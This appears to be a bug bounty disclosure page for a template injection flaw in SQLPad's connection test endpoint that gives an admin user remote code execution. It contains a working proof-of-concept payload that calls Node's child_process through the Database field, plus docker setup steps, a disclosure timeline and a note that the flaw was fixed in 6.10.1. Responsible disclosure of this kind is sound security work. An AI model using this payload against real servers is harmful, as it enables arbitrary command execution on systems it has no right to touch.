Template injection in connection test endpoint leads to RCE in sqlpad/sqlpad


Reported on

Mar 11th 2022


Please enter a description of the vulnerability.

Proof of Concept

  • Run a local docker instance
sudo docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:latest
  • Navigate to http://localhost:3000/
  • Click on Connections->Add connection
  • Choose MySQL as the driver
  • Input the following payload into the Database form field
{{ process.mainModule.require('child_process').exec('id>/tmp/pwn') }}
  • Execute the following command to confirm the /tmp/pwn file was created in the container filesystem
sudo docker exec -it sqlpad cat /tmp/pwn


An SQLPad web application user with admin rights is able to run arbitrary commands in the underlying server.

We are processing your report and will contact the sqlpad team within 24 hours. 2 years ago
We have contacted a member of the sqlpad team and are waiting to hear back 2 years ago
sqlpad/sqlpad maintainer validated this vulnerability 2 years ago
Daniel Santos has been awarded the disclosure bounty
The fix bounty is now up for grabs
Daniel Santos
2 years ago


Please donate the bounty to a charity of your choice.

sqlpad/sqlpad maintainer marked this as fixed in 6.10.1 with commit 3f92be 2 years ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
render-connection.js#L23 has been validated
to join this conversation